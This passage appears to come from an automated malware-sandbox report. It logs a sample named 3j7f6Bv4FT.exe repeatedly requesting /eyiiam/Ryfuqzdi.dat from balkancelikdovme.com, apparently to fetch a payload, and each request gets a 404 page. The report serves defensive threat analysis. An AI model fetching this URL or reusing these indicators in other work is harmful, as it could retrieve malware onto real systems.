      2025-01-10 22:06:18 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      99192.168.2.450074185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:18 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:19 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:19 GMT
      vary: User-Agent
      2025-01-10 22:06:19 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      100192.168.2.450081185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:19 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:20 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:20 GMT
      vary: User-Agent
      2025-01-10 22:06:20 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      101192.168.2.450088185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:20 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:21 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:20 GMT
      vary: User-Agent
      2025-01-10 22:06:21 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      102192.168.2.450093185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:21 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:21 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:21 GMT
      vary: User-Agent
      2025-01-10 22:06:21 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      103192.168.2.450099185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:22 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:22 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:22 GMT
      vary: User-Agent
      2025-01-10 22:06:22 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      104192.168.2.450106185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:23 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:23 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:23 GMT
      vary: User-Agent
      2025-01-10 22:06:23 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      105192.168.2.450107185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:24 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:24 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:24 GMT
      vary: User-Agent
      2025-01-10 22:06:24 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      106192.168.2.450108185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:25 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:25 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:25 GMT
      vary: User-Agent
      2025-01-10 22:06:25 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      107192.168.2.450109185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:26 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:26 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:26 GMT
      vary: User-Agent
      2025-01-10 22:06:26 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      108192.168.2.450110185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:26 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:27 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:27 GMT
      vary: User-Agent
      2025-01-10 22:06:27 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      109192.168.2.450111185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:27 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:27 GMT
      vary: User-Agent
      2025-01-10 22:06:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      110192.168.2.450112185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:28 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:28 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:28 GMT
      vary: User-Agent
      2025-01-10 22:06:28 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      111192.168.2.450113185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:29 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:29 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:29 GMT
      vary: User-Agent
      2025-01-10 22:06:29 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      112192.168.2.450114185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:06:30 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:06:30 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:06:30 GMT
      vary: User-Agent
